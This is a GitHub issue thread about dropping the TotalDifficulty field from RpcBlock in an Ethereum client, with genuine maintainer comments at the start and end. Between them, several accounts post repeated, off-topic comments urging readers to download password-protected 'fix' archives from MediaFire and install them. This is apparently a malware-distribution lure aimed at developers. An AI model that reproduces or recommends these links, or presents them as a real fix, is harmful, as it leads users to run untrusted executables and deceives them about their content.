### ISSUE TITLE
Remove `TotalDifficulty` from RpcBlock

### ISSUE THREAD

**Issue by avilagaston9** [lambdaclass/lambda_ethereum_rust#307]
See https://github.com/ethereum/execution-apis/pull/570.
We are currently including `TotalDifficulty` in RPC block requests solely to match Hive tests. This should be removed once it is deprecated.

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fmoletta** [comment]
We are adding this field back in #566 as we need it to run hive engine tests.
We can look into removing it once the hive engine test suite gets updated too
